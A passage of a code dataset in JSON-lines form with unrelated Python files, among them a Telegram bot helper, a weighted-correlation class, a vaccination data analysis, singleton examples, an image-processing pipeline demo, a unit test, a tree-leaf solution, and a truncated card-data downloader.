logger.warning(\n '%s is blocked for the bot. ',\n tg_chat_id\n )\n set_inactive(chat_id=tg_chat_id, provider=Provider.TG, workflow=workflow)\n\n except BadRequest as e:\n if 'the same' in e.message:\n pass\n elif 'Chat not found' in e.message:\n logger.warning('Tg chat %s not found', tg_chat_id)\n set_inactive(chat_id=tg_chat_id, provider=Provider.TG, workflow=workflow)\n else:\n logger.warning('Failed to send to tg_chat_id=%s', tg_chat_id)\n raise e\n\n if original_message_should_be_removed:\n bot.delete_message(chat_id=tg_chat_id, message_id=original_message.message_id)\n\n\ndef build_tg_response(*, chat_id: int, reply: Reply):\n \"\"\"\n Use it for direct/sync response (vs `send_messages`).\n \"\"\"\n response = {\n 'method': 'sendMessage',\n 'chat_id': chat_id,\n 'text': reply.text,\n }\n\n reply_markup = _build_tg_reply_markup(reply)\n if reply_markup is not None:\n response['reply_markup'] = reply_markup\n\n return response\n\n\ndef _build_tg_reply_markup(reply: Reply) -> dict:\n if not reply.buttons:\n return None\n\n if reply.is_text_buttons:\n return _build_tg_text_keyboard(reply.buttons)\n\n return _build_tg_inline_keyboard(reply.buttons)\n\n\ndef _build_tg_text_keyboard(keyboard):\n if not keyboard:\n return None\n\n return {\n 'keyboard': keyboard,\n 'one_time_keyboard': True,\n 'resize_keyboard': True,\n }\n\n\ndef _build_tg_inline_keyboard(keyboard):\n if not keyboard:\n return None\n\n inline_keyboard = [\n [\n _build_tg_keyboard_cell(cell) for cell in row\n ] for row in keyboard\n ]\n\n return {\n 'inline_keyboard': inline_keyboard,\n }\n\n\ndef _build_tg_keyboard_cell(cell):\n if isinstance(cell, dict):\n formatted_cell = {\n 'text': cell['text'],\n }\n\n if 'data' in cell:\n formatted_cell['callback_data'] = cell['data']\n elif 'url' in cell:\n formatted_cell['url'] = cell['url']\n\n return formatted_cell\n\n return {\n 'text': cell,\n 'callback_data': cell,\n }\n","repo_name":"demidov91/rest_food","sub_path":"rest_food/_sync_communication.py","file_name":"_sync_communication.py","file_ext":"py","file_size_in_byte":6076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"10224576248","text":"import numpy as np\nimport pandas as pd\nfrom scipy.stats import rankdata\n\n__version__ = \"2.1.0\"\n\nclass WeightedCorr:\n def __init__(self, xyw=None, x=None, y=None, w=None, df=None, wcol=None):\n ''' Weighted Correlation class. Either supply xyw, (x, y, w), or (df, wcol). 
Call the class to get the result, i.e.:\n WeightedCorr(xyw=mydata[[x, y, w]])(method='pearson')\n :param xyw: pd.DataFrame with shape(n, 3) containing x, y, and w columns (column names irrelevant)\n :param x: pd.Series (n, ) containing values for x\n :param y: pd.Series (n, ) containing values for y\n :param w: pd.Series (n, ) containing weights\n :param df: pd.Dataframe (n, m+1) containing m phenotypes and a weight column\n :param wcol: str column of the weight column in the dataframe passed to the df argument.\n '''\n if (df is None) and (wcol is None):\n if np.all([i is None for i in [xyw, x, y, w]]):\n raise ValueError('No data supplied')\n if not ((isinstance(xyw, pd.DataFrame)) != (np.all([isinstance(i, pd.Series) for i in [x, y, w]]))):\n raise TypeError('xyw should be a pd.DataFrame, or x, y, w should be pd.Series')\n xyw = pd.concat([x, y, w], axis=1).dropna() if xyw is None else xyw.dropna()\n self.x, self.y, self.w = (pd.to_numeric(xyw[i], errors='coerce').values for i in xyw.columns)\n self.df = None\n elif (wcol is not None) and (df is not None):\n if (not isinstance(df, pd.DataFrame)) or (not isinstance(wcol, str)):\n raise ValueError('df should be a pd.DataFrame and wcol should be a string')\n if wcol not in df.columns:\n raise KeyError('wcol not found in column names of df')\n self.df = df.loc[:, [x for x in df.columns if x != wcol]]\n self.w = pd.to_numeric(df.loc[:, wcol], errors='coerce')\n else:\n raise ValueError('Incorrect arguments specified, please specify xyw, or (x, y, w) or (df, wcol)')\n\n def _wcov(self, x, y, ms):\n return np.sum(self.w * (x - ms[0]) * (y - ms[1]))\n\n def _pearson(self, x=None, y=None):\n x, y = (self.x, self.y) if ((x is None) and (y is None)) else (x, y)\n mx, my = (np.sum(i * self.w) / np.sum(self.w) for i in [x, y])\n return self._wcov(x, y, [mx, my]) / np.sqrt(self._wcov(x, x, [mx, mx]) * self._wcov(y, y, [my, my]))\n\n def _wrank(self, x):\n (unique, arr_inv, counts) = np.unique(rankdata(x), return_counts=True, return_inverse=True)\n a = np.bincount(arr_inv, self.w)\n return (np.cumsum(a) - a)[arr_inv]+((counts + 1)/2 * (a/counts))[arr_inv]\n\n def _spearman(self, x=None, y=None):\n x, y = (self.x, self.y) if ((x is None) and (y is None)) else (x, y)\n return self._pearson(self._wrank(x), self._wrank(y))\n\n def __call__(self, method='pearson'):\n '''\n :param method: Correlation method to be used: 'pearson' for pearson r, 'spearman' for spearman rank-order correlation.\n :return: if xyw, or (x, y, w) were passed to __init__ returns the correlation value (float).\n if (df, wcol) were passed to __init__ returns a pd.DataFrame (m, m), the correlation matrix.\n '''\n if method not in ['pearson', 'spearman']:\n raise ValueError('method should be one of [\\'pearson\\', \\'spearman\\']')\n cor = {'pearson': self._pearson, 'spearman': self._spearman}[method]\n if self.df is None:\n return cor()\n else:\n out = pd.DataFrame(np.nan, index=self.df.columns, columns=self.df.columns)\n for i, x in enumerate(self.df.columns):\n for j, y in enumerate(self.df.columns):\n if i >= j:\n out.loc[x, y] = cor(x=pd.to_numeric(self.df[x], errors='coerce'), y=pd.to_numeric(self.df[y], errors='coerce'))\n out.loc[y, x] = out.loc[x, y]\n return out\n","repo_name":"matthijsz/weightedcorr","sub_path":"WeightedCorr.py","file_name":"WeightedCorr.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"7"} +{"seq_id":"4152234721","text":"# -*- coding: utf-8 -*-\n\n# -- Sheet 
--\n\nimport numpy as np \nimport pandas as pd \n\nimport os\nfor dirname, _, filenames in os.walk('Dataplore'):  # NOTE: the original passed the bare name Dataplore, which is undefined; quoted here so the walk can run\n    for filename in filenames:\n        print(os.path.join(dirname, filename))\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nimport seaborn as sns\nimport datetime as dt\nfrom itertools import chain\n\nfrom ipywidgets import interact, interactive, fixed\nimport ipywidgets as widgets\nfrom IPython.display import display\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nvacc1=pd.read_csv(\"http://api.covid19india.org/csv/latest/cowin_vaccine_data_statewise.csv\")\nvacc1=vacc1.fillna(0)  # fillna returns a copy, so assign the result back\nvacc1[\"Updated On\"]=pd.to_datetime(vacc1[\"Updated On\"],infer_datetime_format=True)\nvacc1.drop([\"AEFI\"],inplace=True,axis=1)\n#display(vacc1.columns)\n#display(vacc1)\n\nvacc=pd.read_csv(\"http://api.covid19india.org/csv/latest/vaccine_doses_statewise.csv\")\nvacc=vacc.fillna(0)\nvacc.index=vacc[\"State\"]\nvacc=vacc.T\nvacc.drop([\"State\"],inplace=True)\nvacc.index=pd.to_datetime(vacc.index,infer_datetime_format=True)\n#display(vacc)\n#display(vacc.columns)\n\ndef f(x):\n    display(x)\n    return x\n\nC = vacc1[\"State\"].unique()\nP = interactive(f, x=widgets.Dropdown(options=C,value='India',description='State:',disabled=False))\nprint(\"Select a state to view vaccination data:\")\ndisplay(P)\n\n#Total doses administered for the selected state\nres=P.result\nState=vacc1[vacc1[\"State\"]==res]\nD=State[\"Updated On\"]\nX=State[\"Total Doses Administered\"]\nplt.figure(figsize=(16,8))\nplt.bar(D,X)\nplt.title(\"{}: Total doses administered\".format(res))\nplt.grid()\nplt.show()\n\n#First dose vs second dose (fully vaccinated)\nX=State[\"First Dose Administered\"]\nY=State[\"Second Dose Administered\"]\nP=Y/X*100\nplt.figure(figsize=(16,8))\nplt.plot(D,X,label=\"First dose\")\nplt.plot(D,Y,label=\"Second dose\")\nplt.title(\"First dose done vs Second dose done\")\nplt.grid()\nplt.legend()\nplt.show()\n\nplt.figure(figsize=(16,8))\nplt.plot(P,color=\"purple\")\nplt.title(\"Percentage of people fully vaccinated\")\nplt.grid()\nplt.show()\n\n#Male vs Female vaccinations\nA=State[State.index==(State.index).max()-3][\"Male(Individuals Vaccinated)\"].values\nB=State[State.index==(State.index).max()-3][\"Female(Individuals Vaccinated)\"].values\nnew=list(chain.from_iterable([A,B]))\nplt.pie(new,labels=[\"Male\",\"Female\"],radius=2,shadow=True,autopct='%1.1f%%',explode = [0,0.1])\nplt.title(\"Vaccinations completed\")\nplt.legend()\nplt.show()\n\n#Covaxin vs Covishield\nA=State[\"Total Covaxin Administered\"].diff()\nB=State[\"Total CoviShield Administered\"].diff()\nX=State[State.index==(State.index).max()-3][\"Total Covaxin Administered\"].values\nY=State[State.index==(State.index).max()-3][\"Total CoviShield Administered\"].values\n\nplt.figure(figsize=(16,8))\nplt.bar(D,B,label=\"CoviShield\",color=\"orange\")\nplt.bar(D,A,label='Covaxin',color=\"blue\")\nplt.title(\"Daily CoviShield vs Covaxin\")\nplt.legend(loc='upper right')\nplt.grid()\nplt.show()\n\nnew=list(chain.from_iterable([X,Y]))\nplt.pie(new,labels=[\"Covaxin\",\"CoviShield\"],radius=2,shadow=True,autopct='%1.1f%%',explode = [0,0.2])\nplt.title(\"Vaccine brand\")\nplt.legend()\nplt.show()\n\ndef f(x):\n    display(x)\n    return x\n\nC = vacc.columns[1:38]\nP = interactive(f, x=widgets.Dropdown(options=C,value='Bihar',description='State:',disabled=False))\nprint(\"Select a state to view vaccination data:\")\ndisplay(P)\n\nState = 
P.result\nX=vacc[\"Total\"] #Total Vaccinations\nY=vacc[State] #State total vaccinations\nDX=X.diff() #Daily vaccinations\nDY=Y.diff() #State Vaccinations\nD=vacc.index\n\nplt.figure(figsize=(16,8))\nplt.bar(D,abs(DY))\nplt.title(\"Daily {} Vaccinations\".format(State))\nplt.grid()\nplt.show()\n\nstate_names=[\"India\",'Andaman Nicobar', 'Andhra P', 'Arunachal P',\n       'Assam', 'Bihar', 'Chandigarh', 'Chhattisgarh',\n       'Daman and Diu', 'Delhi', 'Goa', 'Gujarat',\n       'Haryana', 'Himachal P', 'Jammu Kashmir', 'Jharkhand',\n       'Karnataka', 'Kerala', 'Ladakh', 'Lakshadweep', 'Madhya P',\n       'Maharashtra', 'Manipur', 'Meghalaya', 'Mizoram', 'Nagaland', 'Odisha',\n       'Puducherry', 'Punjab', 'Rajasthan', 'Sikkim', 'Tamil Nadu',\n       'Telangana', 'Tripura', 'Uttar P', 'Uttarakhand', 'West Bengal']\n\nst_df=pd.DataFrame()\nfor st in vacc.columns:\n    X=vacc[st][len(vacc)-2]\n    #print(\"{}: {}\".format(st,X))\n    st_df=st_df.append([X])\n    \nst_df.index=vacc.columns\nst_df.rename(index={\"Total\":\"India\"},inplace=True)\nst_df.drop([\"Miscellaneous\"],inplace=True)\nst_df.columns=[\"Vaccinations\"]\nsorted_st_df=st_df.sort_values(by=[\"Vaccinations\"],ascending=False)\n\npop=pd.read_csv('State-census.csv')\npop[\"Population\"]=pd.to_numeric(pop[\"Population\"],errors=\"coerce\")\npop[\"Density\"]=pd.to_numeric(pop[\"Density\"],errors=\"coerce\")\npop[\"Growth Rate\"]=pd.to_numeric(pop[\"Growth Rate\"],errors=\"coerce\")\ndisplay(pop.head())\n\n#Adding columns to new dataset for vaccinations and population.\nst_df[\"Population\"]=pop[\"Population\"].values\nst_df[\"Urban Pop\"]=pop[\"Urban Population\"].values\nst_df[\"Rural Pop\"]=pop[\"Rural Population\"].values\nst_df[\"Sex Ratio\"]=pop[\"Sex Ratio\"].values\ndisplay(st_df.head())\n\nplt.figure(figsize=(16,10))\nsns.barplot(sorted_st_df[\"Vaccinations\"][1:],sorted_st_df.index[1:],saturation=1,orient=\"h\")\nplt.title(\"Total Vaccinations\",size=20)\nplt.grid()\nplt.xticks(rotation=90,size=12)\nplt.tight_layout()\nplt.show()\n\n# Top 5 vaccinated states\nplt.figure(figsize=(10,6))\nplt.plot(sorted_st_df[1:].head())\nplt.title(\"Maximum vaccinated States\")\nplt.grid()\n\ngender_df=pd.DataFrame()\nbrand_df=pd.DataFrame()\nfor st in vacc1[\"State\"].unique():\n    sp=vacc1[vacc1[\"State\"]==st]\n    X=sp[sp.index==(sp.index).max()-3][\"Male(Individuals Vaccinated)\"].values\n    Y=sp[sp.index==(sp.index).max()-3][\"Female(Individuals Vaccinated)\"].values\n    Covishield=sp[sp.index==(sp.index).max()-3][\"Total CoviShield Administered\"].values\n    Covaxin=sp[sp.index==(sp.index).max()-3][\"Total Covaxin Administered\"].values\n    gender_df=gender_df.append(list(zip(X,Y)))\n    brand_df=brand_df.append(list(zip(Covaxin,Covishield)))\n    \ngender_df.columns=[\"Male\",\"Female\"]\nbrand_df.columns=[\"Covaxin\",\"Covishield\"]\ngender_df.index=state_names\nbrand_df.index=state_names\n#gender_df.sort_values(by=[\"Male\"],ascending=False,inplace=True)\n\n#Comparison of gender and brands\nGen = go.Figure(data=[go.Bar(x=gender_df.index[1:],y=gender_df[\"Male\"][1:], #Trace 1\n                             name=\"Male\",\n                             marker = dict(color = 'rgba(0, 0, 255,1)'),\n                            ),\n                      go.Bar(x=gender_df.index[1:],y=gender_df[\"Female\"][1:],name=\"Female\",\n                             marker=dict(color = 'rgba(255, 0, 0,1)')),\n                     ]  \n               )\nGen.update_xaxes(\n    tickangle = 90,\n    title_font = {\"size\": 1},\n)\nGen.update_layout(\n    height=600,\n    margin=dict(l=20,r=20,b=50,t=50),\n    title=\"Male vs Female\",\n    xaxis_title=\"State\",\n    yaxis_title=\"Vaccinations\",\n    legend_title=\"Gender: \",\n    paper_bgcolor='#9ef7ad',\n    xaxis=dict(\n        rangeselector=dict(\n            
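# quick-select presets for the date axis: 3 months, 6 months, 1 year\n            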
buttons=list([dict(count=3,step=\"month\",stepmode=\"backward\"),\n                          dict(count=6,step=\"month\",stepmode=\"backward\"),\n                          dict(count=1,step=\"year\",stepmode=\"backward\")])\n        ),\n        rangeslider=dict(visible=True),\n    )\n)\n\nBrand = go.Figure(data=[go.Bar(x=brand_df.index[1:],y=brand_df[\"Covaxin\"][1:], #Trace 1\n                               name=\"Covaxin\",\n                               marker = dict(color = 'rgba(0, 0, 255,1)'),\n                               ),\n                        go.Bar(x=brand_df.index[1:],y=brand_df[\"Covishield\"][1:],\n                               name=\"Covishield\",\n                               marker=dict(color = 'rgba(255, 0, 0,1)')),\n                        ] \n                )\nBrand.update_xaxes(\n    tickangle = 90,\n    title_font = {\"size\": 1},\n)\nBrand.update_layout(\n    height=600,\n    margin=dict(l=20,r=20,b=50,t=50),\n    title=\"Covaxin vs Covishield\",\n    xaxis_title=\"State\",\n    yaxis_title=\"Vaccinations\",\n    legend_title=\"Brand: \",\n    paper_bgcolor='#9ef7ad',\n    xaxis=dict(\n        rangeselector=dict(\n            buttons=list([dict(count=3,step=\"month\",stepmode=\"backward\"),\n                          dict(count=6,step=\"month\",stepmode=\"backward\"),\n                          dict(count=1,step=\"year\",stepmode=\"backward\")])\n        ),\n        rangeslider=dict(visible=True),\n    )\n)\n\nGen.show()\nBrand.show()\n\n#Brand Wise:\n\n#All the states have used CoviShield as their primary vaccine, clearly. Overall, Covishield takes up almost 90% of the total vaccinations in India while Covaxin takes up a small value of 10%\n\n#Sex Ratio:\n\n#The sex ratio is the ratio of males to females in the population (normalized to 1000). Shown below is the sex ratio for each state in India.\n\n#It basically shows the number of females per 1000 males.\n\nplt.figure(figsize=(16,6))\nplt.plot(pop[\"State\"],pop[\"Sex Ratio\"])\nplt.scatter(pop[\"State\"],pop[\"Sex Ratio\"])\nplt.ylabel(\"Number of females\")\nplt.xticks(rotation=90)\nplt.title(\"Sex Ratio State-wise\")\nplt.grid()\nplt.show()\n\n#As we can see, most of the states have a higher number of males (i.e. a sex ratio <1000). 
Only Kerala and Puducherry have more females.\n\n#Population\nplt.figure(figsize=(18,6))\nsns.barplot(pop[\"State\"][:36],pop[\"Population\"][:36]*100)  # slice aligned with the state labels (was [1:], which shifted every bar by one state)\nplt.xticks(rotation=90)\nplt.grid()\nplt.show()\n\n#Population Density\nplt.figure(figsize=(16,8))\nplt.plot(pop[\"State\"][:36],pop[\"Density\"][:36],color=\"purple\")\nplt.title(\"Population Density\")\nplt.xticks(rotation=90)\nplt.grid()\nplt.show()\n\nur_per=pop[\"Urban Population\"][:36]*100/pop[\"Population\"][:36]\nrur_per=pop[\"Rural Population\"][:36]*100/pop[\"Population\"][:36]\n\nplt.figure(figsize=(16,8))\nplt.plot(pop[\"State\"][:36],rur_per,label=\"Rural\")\nplt.plot(pop[\"State\"][:36],ur_per,label=\"Urban\")\nplt.scatter(pop[\"State\"][:36],rur_per)\nplt.scatter(pop[\"State\"][:36],ur_per)\nplt.title(\"Urban vs Rural population (%)\")\nplt.xticks(rotation=90)\nplt.legend()\nplt.grid()\nplt.show()\n\n# **VACCINATION STATUS**\n\n\nplt.figure(figsize=(18,6))\nplt.bar(st_df.index,(st_df[\"Vaccinations\"]*100/st_df[\"Population\"]),color=\"#D2B48C\")\nplt.title(\"Vaccinations / Population\")\nplt.xticks(rotation=90) \nplt.grid()\nplt.show()\n\n# **CORRELATION B/W RURAL && URBAN**\n\n\n#Vaccinations in urban and rural areas\nf, ax = plt.subplots(1, 2, figsize = (20, 6))\n\nsns.regplot(st_df[\"Urban Pop\"][:36],st_df[\"Vaccinations\"][:36],ax=ax[0])\nax[0].grid()\nax[0].set_xlabel(\"Urban Population\",fontsize=15)\n\nsns.regplot(st_df[\"Rural Pop\"][:36],st_df[\"Vaccinations\"][:36],ax=ax[1])\nax[1].grid()\nax[1].set_xlabel(\"Rural Population\",fontsize=15)\n\nplt.show()\n\n#Correlation between urban population and vaccination\nnewdf =st_df[['Vaccinations','Urban Pop','Rural Pop']]\ncorrelation = newdf.corr()\nsns.heatmap(correlation, cmap=\"Blues\",linewidths=2,annot=True) \nplt.tight_layout()\n\n# If the value is near ± 1, it is said to be a perfect correlation: as one variable increases, the other variable tends to also increase (if positive) or decrease (if negative). High degree: if the coefficient value lies between ± 0.50 and ± 1, it is said to be a strong correlation. Hence a strong correlation can be seen between Rural and Urban Population\n\n\n\n\n","repo_name":"shubhamjaiswal889/Vaccination-Analysis","sub_path":"Vaccination Status.py","file_name":"Vaccination Status.py","file_ext":"py","file_size_in_byte":11240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"17179458120","text":"from __future__ import annotations\nfrom typing import Optional\n\n\nclass Logger:\n    _instance = None\n\n    def __new__(cls, *args, **kwargs):\n        if cls._instance is None:\n            cls._instance = super(Logger, cls).__new__(cls)\n        return cls._instance\n\n    def __init__(self, level):\n        # called multiple times (once per Logger(...) call), even though the instance is shared\n        self.level = level\n\n\nclass SingletonMeta(type):\n    \"\"\"\n    The Singleton class can be implemented in different ways in Python. Some\n    possible methods include: base class, decorator, metaclass. 
We will use the\n    metaclass because it is best suited for this purpose.\n    \"\"\"\n\n    _instance: Optional[Singleton] = None\n\n    def __call__(cls, *args, **kwargs) -> Singleton:\n        if cls._instance is None:\n            cls._instance = super().__call__(*args, **kwargs)\n        return cls._instance\n\n\nclass Singleton(metaclass=SingletonMeta):\n\n    def __init__(self, value: str) -> None:\n        print('*' * 10) # only called once\n        self.value = value\n\n    def some_business_logic(self):\n        \"\"\"\n        Finally, any singleton should define some business logic, which can be\n        executed on its instance.\n        \"\"\"\n\n        # ...\n\n\nif __name__ == '__main__':\n    logger1 = Logger('info')\n    logger2 = Logger('debug')\n    assert logger1 is logger2\n    assert logger1.level == 'debug'\n    assert logger2.level == 'debug'\n\n    s1 = Singleton(10)\n    s2 = Singleton(20)\n    if id(s1) == id(s2):\n        print(s1.value)\n        print(s2.value)\n        print(\"Singleton works, both variables contain the same instance.\")\n    else:\n        print(\"Singleton failed, variables contain different instances.\")\n","repo_name":"miniyk2012/leetcode","sub_path":"desgin_pattern/singleton/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"25982948486","text":"import sys\nimport os\ntry:\n    import pchain\nexcept Exception as exc:\n    pchain_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),'../')\n    sys.path.insert(0,pchain_path)\n    import pchain\nfrom pchain import pydata\nfrom pchain import pyproc\nfrom pchain.pydata import PCPyDataClass\nfrom pchain.pyproc import PCPyProcClass\n\nfrom PIL import Image\n\nService = pchain.cleinit()\nimport libstarpy\n\nrealm = Service.PCRealmBase._New()\n\npydata.DefineType('SizeClass',type(()))\npydata.DefineType('IntClass',type(int))\npydata.DefineType('ImageFileClass',type(''))\npydata.DefineType('ImageClass')\npydata.DefineType('ImageFormatClass',type(''))\npydata.DefineType('ImageHistogramClass',type([]))\n\n@pyproc.DefineProc('ImageOpenProc',ImageFileClass,ImageClass)\ndef Execute(self,ImageFile) : \n    Context = self.Context # first must save Context in local variable\n    im = Image.open(ImageFile.value())\n    return (0,1,ImageClass(im))\n    \n@pyproc.DefineProc('ImageResizeProc',(ImageClass,SizeClass),ImageClass)\ndef Execute(self,InputImage,NewSize) : \n    Context = self.Context # first must save Context in local variable\n    if Context['SelfObj'].Status < 0 :\n        return (0,0,None)\n    if Context['Cell'].IsFromOutSide(NewSize) == False :\n        print( 'size ',NewSize.value(),' is from internal, reject it')\n        Context['SelfObj'].RejectInput(NewSize)\n        return (2,0,None)\n    newim = InputImage.value().resize(NewSize.value())\n    #--set source image\n    Context['SelfObj'].AddOutputDataEx(ImageClass(newim),InputImage)\n    return (0,1,None)\n\n@pyproc.DefineProc('ImageSizeProc',ImageClass,SizeClass)\ndef Execute(self,InputImage) : \n    Context = self.Context # first must save Context in local variable\n    return (0,1,SizeClass(InputImage.value().size))\n    \n@pyproc.DefineProc('ImageFormatProc',ImageClass,ImageFormatClass)\ndef Execute(self,InputImage) : \n    Context = self.Context # first must save Context in local variable\n    if Context['SelfObj'].Status < 0 :\n        return (0,0,None) \n    if InputImage.value().format is None :\n        return (2,-1,None) \n    return (0,1,ImageFormatClass(InputImage.value().format)) # .value() unwraps the PIL image, as in the other procs (the original read .format off the wrapper)\n    \n@pyproc.DefineProc('ImageHistogramProc',ImageClass,ImageHistogramClass)\ndef Execute(self,InputImage) : \n    Context = self.Context # first must save Context in 
local variable\n return (0,1,ImageHistogramClass(InputImage.value().histogram()))\n \nresult = realm.RunProc((ImageFileClass('pchain.png'),SizeClass((100,100))),None,ImageOpenProc,ImageResizeProc)\nprint(result)\nimg = result\n\nresult = realm.RunProc(img,None,ImageFormatProc,ImageSizeProc,ImageHistogramProc)\nprint(result)\n\nresult = realm.RunProc(img,('m',ImageHistogramClass,'m',SizeClass),ImageFormatProc,ImageSizeProc,ImageHistogramProc)\nprint(result)\n\nprint('dynamic add proc......')\n\n@realm._RegScriptProc_P('OnCellToBeFinish')\ndef OnCellToBeFinish(Realm,cell):\n print('ImageOpenProc is executed? ',cell.IsProcExecuted(ImageOpenProc))\n output = cell.GetCellMissingOutput()\n if output._Number == 0 :\n return False\n for item in output :\n if cell.IsCellOutputMustExist(item) == True :\n input = cell.GetEnvData()\n chain = Realm.BuildProcChain(output,input)\n if chain[0] == False :\n return False # failed\n if cell.FindProc(chain[1]) == None :\n cell.AddProc(chain[1])\n return True\n else :\n return False\n \n@realm._RegScriptProc_P('OnOutputDataToEnv')\ndef OnOutputDataToEnv(Realm,cell,proc,datalist): \n print('output data ',str(datalist))\n\nprint('+++++++++++++++++++++++++')\nresult = realm.RunProc(img,('m',ImageHistogramClass,'m',SizeClass),ImageFormatProc,ImageSizeProc)\nprint(result)\n\nresult = realm.RunProc(img,(ImageHistogramClass,SizeClass),ImageFormatProc,ImageSizeProc)\nprint(result)\n\n\nprint('source is ',str(result[0].GetSource()[0]))\n\npchain.cleterm() ","repo_name":"srplab/pchain","sub_path":"examples/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"9675407366","text":"try:\n\ttry:\n\t\timport context\n\texcept Exception as ImportErr: # pragma: no branch\n\t\tImportErr = None\n\t\tdel ImportErr\n\t\tfrom . 
import context\n\tif context.__name__ is None:\n\t\traise ImportError(\"[CWE-758] Failed to import context\")\n\telse:\n\t\tfrom context import unittest as unittest\n\t\tfrom context import piaplib as piaplib\n\t\tif piaplib.__name__ is None: # pragma: no branch\n\t\t\traise ImportError(\"[CWE-758] Failed to import piaplib\")\nexcept Exception:\n\traise ImportError(\"[CWE-758] Failed to import test context\")\n\n\nclass PKUTestSuite(unittest.TestCase):\n\t\"\"\"Special Pocket PKU test cases.\"\"\"\n\n\tdef test_syntax(self):\n\t\t\"\"\"Test case importing code.\"\"\"\n\t\ttheResult = False\n\t\ttry:\n\t\t\tfrom piaplib import pku\n\t\t\tif pku.__name__ is None:\n\t\t\t\ttheResult = False\n\t\t\ttheResult = True\n\t\texcept Exception as impErr:\n\t\t\tprint(str(type(impErr)))\n\t\t\tprint(str(impErr))\n\t\t\ttheResult = False\n\t\tassert theResult\n\n\tdef test_z_case_pku_insane_none(self):\n\t\t\"\"\"Tests the imposible state for pku given bad tools\"\"\"\n\t\ttheResult = False\n\t\ttry:\n\t\t\timport piaplib.pku.__main__\n\t\t\tself.assertIsNotNone(piaplib.pku.__main__.usePKUTool(\"NoSuchTool\"))\n\t\t\tself.assertIsNotNone(piaplib.pku.__main__.usePKUTool(None))\n\t\t\ttheResult = True\n\t\texcept Exception as err:\n\t\t\tprint(str(\"\"))\n\t\t\tprint(str(type(err)))\n\t\t\tprint(str(err))\n\t\t\tprint(str((err.args)))\n\t\t\tprint(str(\"\"))\n\t\t\terr = None\n\t\t\tdel err\n\t\t\ttheResult = False\n\t\tself.assertTrue(theResult, \"Error leaked while testing piaplib.pku.__main__.usePKUTool()\")\n\n\nif __name__ == u'__main__':\n\tunittest.main()\n","repo_name":"reactive-firewall/PiAP-python-tools","sub_path":"tests/test_pku.py","file_name":"test_pku.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"43191548297","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def leafSimilar(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> bool:\n if not root1 and not root2:\n return True\n elif not (root1 and root2):\n return False\n\n r1 = self._get_leafs(root1)\n r2 = self._get_leafs(root2)\n\n return r1 == r2\n\n def _get_leafs(self, node: TreeNode) -> list[int]:\n ret: list[int] = [] \n def dfs(node: TreeNode):\n if not node.left and not node.right:\n ret.append(node.val)\n \n if node.left:\n dfs(node.left)\n \n \n if node.right:\n dfs(node.right)\n \n dfs(node)\n\n return ret","repo_name":"qtsky89/leetcode","sub_path":"leaf-similar-trees/leaf-similar-trees.py","file_name":"leaf-similar-trees.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24199365508","text":"import json\nimport requests\nimport os\n\nfrom colors import COLOR_CODES\nfrom django.utils.text import slugify\n\nFILEPATH = \"static/assets\"\nCARDS_FILEPATH = f\"{FILEPATH}/cards\"\nDECKS_FILEPATH = f\"{FILEPATH}/decks\"\nCOMMANDERS_FILEPATH = f\"{FILEPATH}/commanders\"\nTHEMES_FILEPATH = f\"{FILEPATH}/themes\"\nTRIBES_FILEPATH = f\"{FILEPATH}/tribes\"\n\n\nBASE_URL = \"https://json.edhrec.com\"\nCARDS_URL = f\"{BASE_URL}/cards\"\nCOMMANDERS_URL = f\"{BASE_URL}/commanders\"\nTRIBES_URL = f\"{BASE_URL}/tribes\"\nTHEMES_URL = f\"{BASE_URL}/themes\"\n\n\ndef download_assets():\n print(\"Downloading assets...\")\n ensure_folders_exist()\n download_commanders_by_color()\n 
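# each helper below first downloads an index JSON, then one JSON file per entry\n    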
download_themes()\n download_tribes()\n\n\ndef ensure_folders_exist():\n paths = [\n FILEPATH,\n CARDS_FILEPATH,\n COMMANDERS_FILEPATH,\n THEMES_FILEPATH,\n TRIBES_FILEPATH,\n DECKS_FILEPATH,\n ]\n for path in paths:\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef download_commanders_by_color():\n for color_code in COLOR_CODES:\n filepath = f\"{COMMANDERS_FILEPATH}/{color_code}.json\"\n url = f\"{COMMANDERS_URL}/{color_code}.json\"\n request_asset_and_save(url=url, filepath=filepath)\n\n\ndef download_themes():\n url = \"https://json.edhrec.com/themes.json\"\n filepath = f\"{THEMES_FILEPATH}/themes.json\"\n request_asset_and_save(url, filepath)\n\n asset = retrieve_asset(\"themes/themes.json\")\n for theme in asset[\"container\"][\"json_dict\"][\"cardlists\"][0][\"cardviews\"]:\n theme_url = f\"{BASE_URL}{theme['url']}.json\"\n slug = slugify(theme[\"name\"])\n theme_filepath = f\"{THEMES_FILEPATH}/theme-{slug}.json\"\n request_asset_and_save(theme_url, theme_filepath)\n\n # Save additional themes\n url = \"https://json.edhrec.com/themes-themesbypopularitysort-1.json\"\n filepath = f\"{THEMES_FILEPATH}/themes-2.json\"\n request_asset_and_save(url, filepath)\n\n asset = retrieve_asset(\"themes/themes-2.json\")\n for theme in asset[\"cardviews\"]:\n theme_url = f\"{BASE_URL}{theme['url']}.json\"\n slug = slugify(theme[\"name\"])\n theme_filepath = f\"{THEMES_FILEPATH}/theme-{slug}.json\"\n request_asset_and_save(theme_url, theme_filepath)\n\n\ndef download_tribes():\n url = 